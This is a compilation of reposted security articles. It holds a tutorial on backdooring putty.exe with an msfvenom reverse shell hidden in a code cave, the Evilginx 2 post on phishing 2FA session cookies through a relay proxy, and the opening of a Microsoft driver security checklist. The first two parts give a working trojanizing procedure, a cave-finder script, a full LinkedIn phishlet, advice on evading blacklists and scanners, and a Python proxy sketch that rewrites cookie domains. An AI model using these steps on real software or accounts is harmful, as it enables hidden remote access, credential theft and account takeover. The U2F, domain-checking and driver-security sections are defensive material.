Let's get started. You can download the Putty version which I have used from here. I will be using Immunity Debugger for debugging purposes; you can use any other debugger, such as OllyDbg.

First we need to find the available code cave space where we can insert our malicious code. You can either add a new section or modify an existing section and use its available code cave space. I have used the cave-miner script to locate available unused bytes (a rough sketch of the same idea appears a bit further below).

Okay, so the cave begins at 00445CD5. I will inject my shellcode starting from 00445CD6. I will hijack the entry point of the program and redirect the execution flow to our shellcode. First of all, we have to make the .data section executable using LordPE or any other PE header editor tool. Once that is done, we need to copy the first few instructions of the entry point and save them somewhere in Notepad. Insert JMP 00445CD6 as the first instruction, which will redirect the execution flow to our newly discovered code cave space. Once the entry point instructions are replaced by the JMP instruction, we need to note down which instructions were overwritten; those need to be restored later.

Now, let's understand the backdoor part:
1. PUSHAD
2. PUSHFD
3. Shellcode
4. Stack alignment
5. POPFD
6. POPAD
7. RESTORE instructions
8. JMP to next instruction

The PUSHAD instruction is equivalent to writing:
Push EAX
Push ECX
Push EDX
Push EBX
Push ESP
Push EBP
Push ESI
Push EDI

POPAD pops the values back off the stack in reverse order, thus restoring all the register values. PUSHAD and POPAD are useful for performing an easy save and restore of the general purpose registers without having to PUSH and POP every individual register in turn. Similarly, PUSHFD and POPFD are used to save and restore the EFLAGS register.

Generate a reverse TCP shellcode from msfvenom in hex format and binary-paste it into the code cave space after the PUSHFD instruction. Note down the ESP value before shellcode execution and after shellcode execution, to find the difference and align the stack.

Before shellcode: ESP = 0018FF68
After shellcode: ESP = 0018FD6C
Difference = 0018FF68 - 0018FD6C = 1FC

Now align the stack by adding this value back to ESP (ADD ESP, 0x1FC).
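Here is the rough cave-finder sketch referred to above - a stand-in for cave-miner for illustration only, not the tool itself. It assumes the third-party pefile library and simply reports long runs of null bytes per section, together with their raw file offset and (relocation-ignoring) virtual address:

import pefile  # third-party library: pip install pefile

MIN_CAVE = 200  # minimum run of null bytes to consider usable

def find_caves(path):
    pe = pefile.PE(path)
    for section in pe.sections:
        data = section.get_data()
        start = None
        for offset, byte in enumerate(data + b"\x01"):  # sentinel closes a trailing run
            if byte == 0:
                if start is None:
                    start = offset
                continue
            if start is not None and offset - start >= MIN_CAVE:
                name = section.Name.rstrip(b"\x00").decode(errors="ignore")
                raw = section.PointerToRawData + start
                va = pe.OPTIONAL_HEADER.ImageBase + section.VirtualAddress + start
                print(f"{name}: {offset - start} null bytes at file offset {raw:#x}, VA {va:#x}")
            start = None

if __name__ == "__main__":
    find_caves("putty.exe")

As in the write-up, remember that the section holding the cave (here .data) still has to be marked executable before the JMP into it will work.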
After restoring the original instructions, save the newly modified executable and listen with netcat for the reverse connection. As soon as I started Putty, it got stuck and didn't open until I closed the reverse connection. This is due to a function called WaitForSingleObject used in msfvenom shellcodes. Here is a nice article on the same issue and how to fix it: https://simonuvarov.com/msfvenom-reverse-tcp-waitforsingleobject/

The msfvenom shellcode uses INFINITE as the value for the dwMilliseconds parameter. The WaitForSingleObject problem is fixed by changing the dwMilliseconds parameter value from -1 to 0 (the DEC ESI instruction that produces the -1 is replaced with a NOP).

Once it is fixed, save the executable and you are good to go.

POC: as soon as I open putty.exe it gives a reverse shell and, at the same time, Putty keeps working perfectly, like a charm.

Thanks for reading. Happy hacking.

Sursa: http://www.theanuragsrivastava.in/2018/07/backdoring-pe-files-using-code-caves.html?m=1
-
Evilginx 2 - Next Generation of Phishing 2FA Tokens 26 July 2018 on evilginx, mitm, security, phishing, research, golang, 2fa, tool It's been over a year since the first release of Evilginx and looking back, it has been an amazing year. I've received tons of feedback, got invited to WarCon by @antisnatchor (thanks man!) and met amazing people from the industry. A year ago, I wouldn't have even expected that one day Kevin Mitnick would showcase Evilginx in his live demos around the world and Techcrunch would write about it! At WarCon I met the legendary @evilsocket (he is a really nice guy), who inspired me with his ideas to learn GO and rewrite Evilginx as a standalone application. It is amazing how GO seems to be ideal for offensive tools development and bettercap is its best proof! This is where Evilginx is now. No more nginx, just pure evil. My main goal with this tool's release was to focus on minimizing the installation difficulty and maximizing the ease of use. Usability was not necessarily the strongest point of the initial release. Updated instructions on usage and installation can always be found up-to-date on the tool's official GitHub project page. In this blog post I only want to explain some general concepts of how it works and its major features. TL;DR What am I looking at? Evilginx is an attack framework for setting up phishing pages. Instead of serving templates of sign-in pages lookalikes, Evilginx becomes a relay between the real website and the phished user. Phished user interacts with the real website, while Evilginx captures all the data being transmitted between the two parties. Evilginx, being the man-in-the-middle, captures not only usernames and passwords, but also captures authentication tokens sent as cookies. Captured authentication tokens allow the attacker to bypass any form of 2FA enabled on user's account (except for U2F - more about it further below). Even if phished user has 2FA enabled, the attacker, outfitted with just a domain and a VPS server, is able to remotely take over his/her account. It doesn't matter if 2FA is using SMS codes, mobile authenticator app or recovery keys. Take a look at the video demonstration, showing how attacker's can remotely hack an Outlook account with enabled 2FA. Disclaimer: Evilginx project is released for educational purposes and should be used only in demonstrations or legitimate penetration testing assignments with written permission from to-be-phished parties. Goal is to show that 2FA is not a silver bullet against phishing attempts and people should be aware that their accounts can be compromised, nonetheless, if they are not careful. >> Download Evilginx 2 from GitHub << Remember - 2FA is not a silver bullet against phishing! 2FA is very important, though. This is what head of Google Threat Intelligence had to say on the subject: Old phishing tactics Common phishing attacks, we see every day, are HTML templates, prepared as lookalikes of popular websites' sign-in pages, luring victims into disclosing their usernames and passwords. When the victim enters his/her username and password, the credentials are logged and attack is considered a success. This is where 2FA steps in. If phished user has 2FA enabled on their account, the attacker would require an additional form of authentication, to supplement the username and password they intercepted through phishing. 
That additional form of authentication may be SMS code coming to your mobile device, TOTP token, PIN number or answer to a question that only the account owner would know. Attacker not having access to any of these will never be able to successfully authenticate and login into victim's account. Old phishing methods which focus solely on capturing usernames and passwords are completely defeated by 2FA. Phishing 2.0 What if it was possible to lure the victim not only to disclose his/her username and password, but also to provide the answer to any 2FA challenge that may come after the credentials are verified? Intercepting a single 2FA answer would not do the attacker any good. Challenge will change with every login attempt, making this approach useless. After each successful login, website generates an authentication token for the user's session. This token (or multiple tokens) is sent to the web browser as a cookie and is saved for future use. From that point, every request sent from the browser to the website will contain that session token, sent as a cookie. This is how websites recognize authenticated users after successful authentication. They do not ask users to log in, every time when page is reloaded. This session token cookie is pure gold for the attacker. If you export cookies from your browser and import them into a different browser, on a different computer, in a different country, you will be authorized and get full access to the account, without being asked for usernames, passwords or 2FA tokens. This is what it looks like, in Evilginx 2, when session token cookie is successfully captured: Now that we know how valuable the session cookie is, how can the attacker intercept it remotely, without having physical access to the victim's computer? Common phishing attacks rely on creating HTML templates which take time to make. Most work is spent on making them look good, being responsive on mobile devices or properly obfuscated to evade phishing detection scanners. Evilginx takes the attack one step further and instead of serving its own HTML lookalike pages, it becomes a web proxy. Every packet, coming from victim's browser, is intercepted, modified and forwarded to the real website. The same happens with response packets, coming from the website; they are intercepted, modified and sent back to the victim. With Evilginx there is no need to create your own HTML templates. On the victim side everything looks as if he/she was communicating with the legitimate website. User has no idea idea that Evilginx sits as a man-in-the-middle, analyzing every packet and logging usernames, passwords and, of course, session cookies. You may ask now, what about encrypted HTTPS connection using SSL/TLS that prevents eavesdropping on the communication data? Good question. Problem is that the victim is only talking, over HTTPS, to Evilginx server and not the true website itself. Evilginx initiates its own HTTPS connection with the victim (using its own SSL/TLS certificates), receives and decrypts the packets, only to act as a client itself and establish its own HTTPS connection with the destination website, where it sends the re-encrypted packets, as if it was the victim's browser itself. This is how the trust chain is broken and the victim still sees that green lock icon next to the address bar, in the browser, thinking that everyone is safe. 
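To make the relay behaviour just described a bit more concrete, here is a concept-level sketch of a transparent reverse proxy, written in Python purely for illustration (Evilginx itself is written in Go and does far more): it forwards each request upstream, then rewrites the upstream hostname and the cookie Domain attribute in the response. TLS termination, POST bodies, redirects and error handling are all left out, and both hostnames are placeholders.

import http.server
import urllib.request

PROXY_HOST = "proxy-host.example"     # placeholder: the hostname the browser talks to
UPSTREAM_HOST = "legit-site.example"  # placeholder: the real site being relayed

class Relay(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Re-issue the browser's request against the real site.
        req = urllib.request.Request("https://" + UPSTREAM_HOST + self.path)
        for name, value in self.headers.items():
            if name.lower() not in ("host", "accept-encoding", "connection"):
                req.add_header(name, value)
        with urllib.request.urlopen(req) as resp:
            # Substitute the upstream hostname in the body and cookie domains.
            body = resp.read().replace(UPSTREAM_HOST.encode(), PROXY_HOST.encode())
            self.send_response(resp.status)
            for name, value in resp.getheaders():
                if name.lower() in ("content-length", "content-encoding",
                                    "transfer-encoding", "connection"):
                    continue
                if name.lower() == "set-cookie":
                    value = value.replace("Domain=" + UPSTREAM_HOST,
                                          "Domain=" + PROXY_HOST)
                self.send_header(name, value)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

if __name__ == "__main__":
    http.server.HTTPServer(("", 8080), Relay).serve_forever()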
When the victim enters the credentials and is asked to provide a 2FA challenge answer, they are still talking to the real website, with Evilginx relaying the packets back and forth, sitting in the middle. Even while being phished, the victim will still receive the 2FA SMS code on his/her mobile phone, because he/she is talking to the real website (just through a relay). After the 2FA challenge is completed by the victim and the website confirms its validity, the website generates the session token, which it returns in the form of a cookie. This cookie is intercepted by Evilginx and saved. Evilginx determines that authentication was a success and redirects the victim to any URL it was set up with (online document, video etc.). At this point the attacker holds all the keys to the castle and is able to use the victim's account, fully bypassing 2FA protection, after importing the session token cookies into his web browser.

Be aware that: every sign-in page requiring the user to provide their password, with any form of 2FA implemented, can be phished using this technique!

How to protect yourself?

There is one major flaw in this phishing technique that anyone can and should exploit to protect themselves - the attacker must register their own domain. By registering a domain, the attacker will try to make it look as similar to the real, legitimate domain as possible. For example, if the attacker is targeting Facebook (real domain is facebook.com), they can, for example, register a domain faceboook.com or faceb00k.com, maximizing their chances that phished victims won't spot the difference in the browser's address bar.

That said - always check the legitimacy of the website's base domain, visible in the address bar, if it asks you to provide any private information. By base domain I mean the one that precedes the top-level domain. As an example, imagine this is the URL and the website you arrived at asks you to log into Facebook:

https://en-gb.facebook.cdn.global.faceboook.com/login.php

The top-level domain is .com and the base domain would be the preceding word, with the next . as a separator. Combined with the TLD, that would be faceboook.com. When you verify that faceboook.com is not the real facebook.com, you will know that someone is trying to phish you.

As a side note - the green lock icon seen next to the URL, in the browser's address bar, does not mean that you are safe! The green lock icon only means that the website you've arrived at encrypts the transmission between you and the server, so that no one can eavesdrop on your communication. Attackers can easily obtain SSL/TLS certificates for their phishing sites and give you a false sense of security with the ability to display the green lock icon as well.

Figuring out if the base domain you see is valid may not always be easy and leaves room for error. It became even harder with the support of Unicode characters in domain names. This made it possible for attackers to register domains with special characters (e.g. in Cyrillic) that would be lookalikes of their Latin counterparts. This technique received the name of a homograph attack. As a quick example, an attacker could register a domain facebooĸ.com, which would look pretty convincing even though it is a completely different domain name (ĸ is not really k). It got even worse with other Cyrillic characters, allowing for ebаy.com vs ebay.com. The first one uses a Cyrillic counterpart for one character, which looks exactly the same.
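To make the base-domain check above concrete, here is a small, deliberately naive Python sketch (my own illustration, not part of the article): it simply takes the last two labels of the hostname, ignores multi-label public suffixes such as .co.uk - a real check should use the Public Suffix List, e.g. via the tldextract package - and does nothing about the homograph problem just described.

from urllib.parse import urlsplit

def base_domain(url):
    # Naive: registrable domain approximated as the last two hostname labels.
    host = urlsplit(url).hostname or ""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host

print(base_domain("https://en-gb.facebook.cdn.global.faceboook.com/login.php"))
# -> faceboook.com (three o's - not the real facebook.com)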
Major browsers were fast to address the problem and added special filters to prevent domain names from being displayed in Unicode, when suspicious characters were detected. If you are interested in how it works, check out the IDN spoofing filter source code of the Chrome browser. Now you see that verifying domains visually is not always the best solution, especially for big companies, where it often takes just one employee to get phished and allow attackers to steal vast amounts of data. This is why FIDO Alliance introduced U2F (Universal 2nd Factor Authentication) to allow for unphishable 2nd factor authentication. In short, you have a physical hardware key on which you just press a button when the website asks you to. Additionally it may ask you for account password or a complementary 4 digit PIN. The website talks directly with the hardware key plugged into your USB port, with the web browser as the channel provider for the communication. What is different with this form of authentication, is that U2F protocol is designed to take the website's domain as one of the key components in negotiating the handshake. This means that if the domain in the browser's address bar, does not match the domain used in the data transmission between the website and the U2F device, the communication will simply fail. This solution leaves no room for error and is totally unphishable using Evilginx method. Citing the vendor of U2F devices - Yubico (who co-developed U2F with Google): With the YubiKey, user login is bound to the origin, meaning that only the real site can authenticate with the key. The authentication will fail on the fake site even if the user was fooled into thinking it was real. This greatly mitigates against the increasing volume and sophistication of phishing attacks and stops account takeovers. It is important to note here that Markus Vervier (@marver) and Michele Orrù (@antisnatchor) did demonstrate a technique on how an attacker can attack U2F devices using the newly implemented WebUSB feature in modern browsers (which allows websites to talk with USB connected devices). It is also important to mention that Yubico, the creator of popular U2F devices YubiKeys, tried to steal credit for their research, which they later apologized for. You can find the list of all websites supporting U2F authentication here. Coinciding with the release of Evilginx 2, WebAuthn is coming out in all major web browsers. It will introduce the new FIDO2 password-less authentication standard to every browser. Chrome, Firefox and Edge are about to receive full support for it. To wrap up - if you often need to log into various services, make your life easier and get a U2F device! This will greatly improve your accounts' security. Under the hood Interception of HTTP packets is possible since Evilginx acts as an HTTP server talking to the victim's browser and, at the same time, acts as an HTTP client for the website where the data is being relayed to. To make it possible, the victim has to be contacting Evilginx server through a custom phishing URL that will point to Evilginx server. Simply forwarding packets from victim to destination website would not work well and that's why Evilginx has to do some on-the-fly modifications. In order for the phishing experience to be seamless, the proxy overcomes the following obstacles: 1. Making sure that the victim is not redirected to phished website's true domain. 
Since the phishing domain will differ from the legitimate domain, used by phished website, relayed scripts and HTML data have to be carefully modified to prevent unwanted redirection of victim's web browser. There will be HTML submit forms pointing to legitimate URLs, scripts making AJAX requests or JSON objects containing URLs. Ideally the most reliable way to solve it would be to perform regular expression string substitution for any occurrence of https://legit-site.com and replacing it with https://our-phishing-site.com. Unfortunately this is not always the case and it requires some trial and error kung-fu, working with web inspector to track down all strings the proxy needs to replace to not break website's functionality. If target website uses multiple options for 2FA, each route has to be inspected and analyzed. For example, there are JSON objects transporting escaped URLs like https:\/\/legit-site.com. You can see that this will definitely not trigger the regexp mentioned above. If you replaced all occurrences of legit-site.com you may break something by accident. 2. Responding to DNS requests for multiple subdomains. Websites will often make requests to multiple subdomains under their official domain or even use a totally different domain. In order to proxy these transmissions, Evilginx has to map each of the custom subdomains to its own IP address. Previous version of Evilginx required the user to set up their own DNS server (e.g. bind) and set up DNS zones to properly handle DNS A requests. This generated a lot of headache on the user part and was only easier if the hosting provider (like Digital Ocean) provided an easy-to-use admin panel for setting up DNS zones. With Evilginx 2 this issue is gone. Evilginx now runs its own in-built DNS server, listening on port 53, which acts as a nameserver for your domain. All you need to do is set up the nameserver addresses for your domain (ns1.yourdomain.com and ns2.yourdomain.com) to point to your Evilginx server IP, in the admin panel of your domain hosting provider. Evilginx will handle the rest on its own. 3. Modification of various HTTP headers. Evilginx modifies HTTP headers sent to and received from the destination website. In particular the Origin header, in AJAX requests, will always hold the URL of the requesting site in order to comply with CORS. Phishing sites will hold a phishing URL as an origin. When request is forwarded, the destination website will receive an invalid origin and will not respond to such request. Not replacing the phishing hostname with the legitimate one in the request would make it also easy for the website to notice suspicious behavior. Evilginx automatically changes Origin and Referer fields on-the-fly to their legitimate counterparts. Same way, to avoid any conflicts with CORS from the other side, Evilginx makes sure to set the Access-Control-Allow-Origin header value to * (if it exists in the response) and removes any occurrences of Content-Security-Policy headers. This guarantees that no request will be restricted by the browser when AJAX requests are made. Other header to modify is Location, which is set in HTTP 302 and 301 responses to redirect the browser to different location. Naturally the value will come with legitimate website URL and Evilginx makes sure this location is properly switched to corresponding phishing hostname. 4. Cookies filtering. It is common for websites to manage cookies for various purposes. Each cookie is assigned to a specific domain. 
Web browser's task is to automatically send the stored cookie, with every request to the domain, the cookie was assigned to. Cookies are also sent as HTTP headers, but I decided to make a separate mention of them here, due to their importance. Example cookie sent from the website to client's web browser would look like this: Set-Cookie: qwerty=219ffwef9w0f; Domain=legit-site.com; Path=/; Expires=Wed, 30 Aug 2019 00:00:00 GMT HTTP As you can see the cookie will be set in client's web browser for legit-site.com domain. Since the phishing victim is only talking to the phishing website with domain our-phishing-site.com, such cookie will never be saved in the browser, because of the fact the cookie domain differs from the one the browser is communicating with. Evilginx will parse every occurrence of Set-Cookie in HTTP response headers and modify the domain, replacing it with the phishing one, as follows: Set-Cookie: qwerty=219ffwef9w0f; Domain=our-phishing-site.com; Path=/; HTTP Evilginx will also remove expiration date from cookies, if the expiration date does not indicate that the cookie should be deleted from browser's cache. Evilginx also sends its own cookies to manage the victim's session. These cookies are filtered out from every HTTP request, to prevent them from being sent to the destination website. 5. SSL splitting. As the whole world of world-wide-web migrates to serving pages over secure HTTPS connections, phishing pages can't be any worse. Whenever you pick a hostname for your phishing page (e.g. totally.not.fake.linkedin.our-phishing-domain.com), Evilginx will automatically obtain a valid SSL/TLS certificate from LetsEncrypt and provide responses to ACME challenges, using the in-built HTTP server. This makes sure that victims will always see a green lock icon next to the URL address bar, when visiting the phishing page, comforting them that everything is secured using "military-grade" encryption! 6. Anti-phishing tricks There are rare cases where websites would employ defenses against being proxied. One of such defenses I uncovered during testing is using javascript to check if window.location contains the legitimate domain. These detections may be easy or hard to spot and much harder to remove, if additional code obfuscation is involved. Improvements The greatest advantage of Evilginx 2 is that it is now a standalone console application. There is no need to compile and install custom version of nginx, which I admit was not a simple feat. I am sure that using nginx site configs to utilize proxy_pass feature for phishing purposes was not what HTTP server's developers had in mind, when developing the software. Evilginx 1 was pretty much a combination of several dirty hacks, duct taped together. Nonetheless it somehow worked! Additionally to fully responsive console UI, here are the greatest improvements: Tokenized phishing URLs In previous version of Evilginx, entering just the hostname of your phishing URL address in the browser, with root path (e.g. https://totally.not.fake.linkedin.our-phishing-domain.com/), would still proxy the connection to the legitimate website. This turned out to be an issue, as I found out during development of Evilginx 2. Apparently once you obtain SSL/TLS certificates for the domain/hostname of your choice, external scanners start scanning your domain. Scanners gonna scan. The scanners use public certificate transparency logs to scan, in real-time, all domains which have obtained valid SSL/TLS certifcates. 
With public libraries like CertStream, you can easily create your own scanner. For some phishing pages, it usually took about an hour for the hostname to become banned and blacklisted by popular anti-spam filters like Spamhaus. After I had three hostnames blacklisted for one domain, the whole domain got blocked. Three strikes and you're out! I began thinking how such detection could be evaded. The easiest solution would have been to reply with a faked response to every request for the path /, but that would not work if scanners probed any other path. Then I decided that each phishing URL generated by Evilginx should come with a unique token in the URL, as a GET parameter. For example, Evilginx responds with a redirection when a scanner makes a request to the URL:
https://totally.not.fake.linkedin.our-phishing-domain.com/auth/signin
But it responds with the proxied phishing page instead when the URL is properly tokenized, with a valid token:
https://totally.not.fake.linkedin.our-phishing-domain.com/auth/signin?tk=secret_l33t_token
When a tokenized URL is opened, Evilginx sets a validation cookie in the victim's browser, whitelisting all subsequent requests, even the non-tokenized ones. This works very well, but there is still a risk that scanners will eventually scan tokenized phishing URLs once these get out into the interwebz.
Hiding your phishlets
This thought provoked me to find a solution that allows manual control over when the phishing proxy should respond with the proxied website and when it should not. As a result, you can hide and unhide the phishing page whenever you want. A hidden phishing page will respond with a 302 HTTP redirection code, redirecting the requester to a predefined URL (Rick Astley's famous clip on YouTube is the default). Temporarily hiding your phishlet may be useful when you want to use a URL shortener (like goo.gl or bit.ly) to shorten your phishing URL, or when you are sending the phishing URL via email and you don't want to trigger any email scanners on the way.
Phishlets
Phishlets are the new site configs. They are plain-text ruleset files, in YAML format, which are fed into the Evilginx engine. Phishlets define which subdomains are needed to properly proxy a specific website, what strings should be replaced in relayed packets and which cookies should be captured, to properly take over the victim's account. There is one phishlet for each phished website. You can deploy as many phishlets as you want, with each phishlet set up for a different website. Phishlets can be enabled and disabled as you please, and at any point Evilginx can be running and managing any number of them. I will do a better job than I did last time, when I released Evilginx 1, and I will try to explain the structure of a phishlet and give you a brief insight into how phishlets are created (I promise to release a separate blog post about it later!).
I will dissect the LinkedIn phishlet for the purpose of this short guide:
name: 'linkedin'
author: '@mrgretzky'
min_ver: '2.0.0'
proxy_hosts:
  - { phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true }
sub_filters:
  - { hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json'] }
  - { hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json'] }
  - { hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: '//{hostname}/nhome/', replace: '//{hostname}/nhome/', mimes: ['text/html', 'application/json'] }
auth_tokens:
  - domain: 'www.linkedin.com'
    keys: ['li_at']
user_regex:
  key: 'session_key'
  re: '(.*)'
pass_regex:
  key: 'session_password'
  re: '(.*)'
landing_path:
  - '/uas/login'
First things first: I advise you to get familiar with YAML syntax to avoid any errors when editing or creating your own phishlets.
Starting off with the simple and rather self-explanatory variables. name is the name of the phishlet, which would usually be the name of the phished website. author is where you can do some self-promotion - this will be visible in Evilginx's UI when the phishlet is loaded. min_ver is currently not enforced, but will very likely be used when the phishlet format changes in future releases of Evilginx, to provide a way of checking a phishlet's compatibility with the current tool version.
Following that, we have proxy_hosts. This holds an array of subdomains that Evilginx will manage - all hostnames for which you want to intercept the transmission - and gives you the capability to make on-the-fly packet modifications.
phish_sub : subdomain name that will be prefixed in the phishlet's hostname. I advise leaving it the same as the original subdomain name, due to issues that may arise later when doing string replacements, as it often requires additional work to support custom subdomain names.
orig_sub : the original subdomain name as used on the legitimate website.
domain : the website's domain that we are targeting.
session : set this to true ONLY for subdomains that will return authentication cookies. This indicates which subdomain Evilginx should recognize as the one that will initiate the creation of an Evilginx session, and sets the Evilginx session cookie for the domain name of this entry.
is_landing : set this to true if you want this subdomain to be used in the generation of phishing URLs later.
In the LinkedIn example, we only have one subdomain that we need to support, which is www. The phishing hostname for this subdomain will then be: www.totally.not.fake.linkedin.our-phishing-domain.com.
Next are sub_filters, which tell Evilginx all about the string substitution magic.
hostname : original hostname of the website, for which the substitution will take place.
sub : subdomain name from the original hostname. This will only be used as a helper string in the substitutions that I explain below.
domain : domain name of the original hostname. Same as sub - used as a helper string in substitutions.
search : the regular expression of what to search for in the HTTP packet's body. You can use some variables in {...} that Evilginx will prefill for you. I listed all supported variables below.
replace : the string that will act as a replacement for all occurrences of search regular expression matches. {...} variables are also supported here.
mimes : an array of MIME types that will be considered before doing search and replace. One of these defined MIME types must show up in the Content-Type header of the HTTP response before Evilginx considers doing any substitutions for that packet. The most common MIME types to use here are: text/html, application/json, application/javascript or text/javascript.
redirect_only : use this sub_filter only if a redirection URL is set in the generated phishing URL (true or false).
The following is a list of bracket variables that you can use in the search and replace parameters:
{hostname} : a combination of the subdomain, defined by the sub parameter, and the domain, defined by the domain parameter. In the search field it will be translated to the original website's hostname (e.g. www.linkedin.com). In the replace field, it will be translated to the corresponding phishing hostname of the matching proxy_hosts entry (e.g. www.totally.not.fake.linkedin.our-phishing-domain.com).
{subdomain} : same as {hostname}, but only for the subdomain.
{domain} : same as {hostname}, but only for the domain.
{domain_regexp} : same as {domain}, but translates to a properly escaped regular expression string. This can sometimes be useful when replacing anti-phishing protections in JavaScript that try to verify whether window.location contains the legitimate domain.
{hostname_regexp} : same as above, but for the hostname.
{subdomain_regexp} : same as above, but for the subdomain.
In the example we have:
- { hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json'] }
This will make Evilginx search for packets with a Content-Type of text/html or application/json and look for occurrences of action="https://www\.linkedin\.com (the properly escaped regexp). If found, it will replace every occurrence with action="https://www.totally.not.fake.linkedin.our-phishing-domain.com. As you can see, this will replace the action URL of the login HTML form to have it point to the Evilginx server, so that the victim does not stray off the phishing path.
That was the most complicated part. Now it should be pretty straightforward.
Next up are auth_tokens. This is where you define the cookies that should be captured on successful login, which combined together provide the full state of the website's captured session. The cookies defined here, when obtained, can later be imported into any browser (using this extension in Chrome) and allow you to be immediately logged into the victim's account, bypassing any 2FA challenges.
domain : the original domain the cookies will be saved for.
keys : array of cookie names that should be captured.
In the example, there is only one cookie that LinkedIn uses to verify the session's state. Only the li_at cookie, saved for the www.linkedin.com domain, will be captured and stored. Once Evilginx captures all of the defined cookies, it will display a message that authentication was successful and will store them in the database.
The two following parameters, user_regex and pass_regex, are similar. They define the POST request keys that should be searched for occurrences of usernames and passwords. Searching is defined by a regular expression that is run against the contents of the POST request's key value.
key : name of the POST request key.
re : regular expression defining what data should be captured from the key's value (e.g. (.*) will capture the whole value).
The last parameter is the landing_path array, which holds the URL paths to the login pages (usually one) of the phished website. In our example, there is /uas/login, which would translate to https://www.totally.not.fake.linkedin.our-phishing-domain.com/uas/login for the generated phishing URL.
Hope that sheds some light on how you can create your own phishlets and helps you understand the ones that are already shipped with Evilginx in the ./phishlets directory.
Future development
I'd like to continue working on Evilginx 2 and there are some things I have in mind that I want to eventually implement. One such thing is serving an HTML page instead of a 302 redirect for hidden phishlets. This could be a page imitating CloudFlare's "checking your browser" screen that would wait in a loop and redirect to the phishing page as soon as you unhide your phishlet. Another is to have Evilginx launch as a daemon, without the UI.
Business Inquiries
If you are a red teaming company interested in the development of custom phishing solutions, drop me a line and I will be happy to assist in any way I can. If you are giving presentations on the flaws of 2FA and/or promoting the use of FIDO U2F/FIDO2 devices, I'd love to hear how Evilginx can help you raise awareness. In any case, send me an email at: kuba@breakdev.org
I'll respond as soon as I can!
Credits
Since the release of Evilginx 1, in April last year, a lot has changed in my life for the better. I met a lot of wonderful, talented people, in front of whom I could exercise my impostor syndrome! I'd like to thank a few people without whom this release would not have been possible:
@evilsocket - for letting me know that Evilginx is awesome, inspiring me to learn Go and for developing so many incredible products that I could steal borrow code from!
@antisnatchor and @h0wlu - for organizing WarCon and for inviting me!
@juliocesarfort and @Mario_Vilas - for organizing AlligatorCon and for being great reptiles!
@x33fcon - for organizing x33fcon and letting me do all these lightning talks!
Vincent Yiu (@vysecurity) - for all the red tips and invitations to secret security gatherings!
Kevin Mitnick (@kevinmitnick) - for giving Evilginx a try and making me realize its importance!
@i_bo0om - for giving me the idea to play with nginx's proxy_pass feature in his post.
Cristofaro Mune (@pulsoid) & Denis Laskov (@it4sec) - for spending their precious time to hear out my concerns about releasing such a tool to the public.
Giuseppe "Ohpe" Trotta (@Giutro) - for the heads up that there may be other similar tools lurking around in the darkness.
#apt - everyone I met there, for sharing amazing contributions. Thank you!
That's it! Thanks for making it through this overly long post! Enjoy the tool and I'm waiting for your feedback!
>> Follow me on Twitter <<
>> Download Evilginx 2 from GitHub <<
Kuba Gretzky
I am a reverse engineer, security researcher and software developer. I develop offensive tools for red teams and look for software vulnerabilities in my free time. Evilginx is my baby.
Sursa: https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/
-
-
-
Driver security checklist
01/26/2018
This article provides a driver security checklist for driver developers to help reduce the risk of drivers being compromised.
Driver security overview
A security flaw is any flaw that allows an attacker to cause a driver to malfunction in such a way that it causes the system to crash or become unusable. In addition, vulnerabilities in driver code can allow an attacker to gain access to the kernel, creating a possibility of compromising the entire OS. When most developers are working on their driver, their focus is on getting the driver to work properly, and not on whether a malicious attacker will attempt to exploit vulnerabilities within their code. After a driver is released, however, attackers can attempt to probe and identify security flaws. Developers must consider these issues during the design and implementation phase in order to minimize the likelihood of such vulnerabilities. The goal is to eliminate all known security flaws before the driver is released.
Creating more secure drivers requires the cooperation of the system architect (consciously thinking of potential threats to the driver), the developer implementing the code (defensively coding common operations that can be the source of exploits), and the test team (proactively attempting to find weaknesses and vulnerabilities). By properly coordinating all of these activities, the security of the driver is dramatically enhanced.
In addition to avoiding the issues associated with a driver being attacked, many of the steps described, such as more precise use of kernel memory, will increase the reliability of your driver. This will reduce support costs and increase customer satisfaction with your product. Completing the tasks in the checklist below will help to achieve all these goals.
Security checklist: complete the security task described in each of these topics.
Confirm that a kernel driver is required
Use the driver frameworks
Control access to software-only drivers
Do not production sign test driver code
Perform threat analysis
Follow driver secure coding guidelines
Validate Device Guard compatibility
Follow technology-specific code best practices
Perform peer code review
Manage driver access control
Enhance device installation security
Execute proper release driver signing
Use code analysis in Visual Studio to investigate driver security
Use Static Driver Verifier to check for vulnerabilities
Check code with BinScope Binary Analyzer
Use code validation tools
Review debugger techniques and extensions
Review secure coding resources
Summary of key takeaways
Confirm that a kernel driver is required
Security checklist item #1: Confirm that a kernel driver is required and that a lower-risk approach, such as a Windows service or app, is not a better option.
Drivers live in the Windows kernel, and having an issue when executing in the kernel exposes the entire operating system. If any other option is available, it will likely be lower cost and carry less risk than creating a new kernel driver. For more information about using the built-in Windows drivers, see Do you need to write a driver?. For information on using background tasks, see Support your app with background tasks. For information on using Windows Services, see Services.
Use the driver frameworks
Security checklist item #2: Use the driver frameworks to reduce the size of your code and increase its reliability and security.
Use the Windows Driver Frameworks to reduce the size of your code and increase its reliability and security. To get started, review Using WDF to Develop a Driver. For information on using the lower-risk user-mode driver framework (UMDF), see Choosing a driver model. Writing an old-fashioned Windows Driver Model (WDM) driver is more time consuming, costly, and almost always involves recreating code that is available in the driver frameworks.
The Windows Driver Framework source code is open source and available on GitHub. This is the same source code from which the WDF runtime library that ships in Windows 10 is built. You can debug your driver more effectively when you can follow the interactions between the driver and WDF. Download it from http://github.com/Microsoft/Windows-Driver-Frameworks.
Control access to software-only drivers
Security checklist item #3: If a software-only driver is going to be created, additional access control must be implemented.
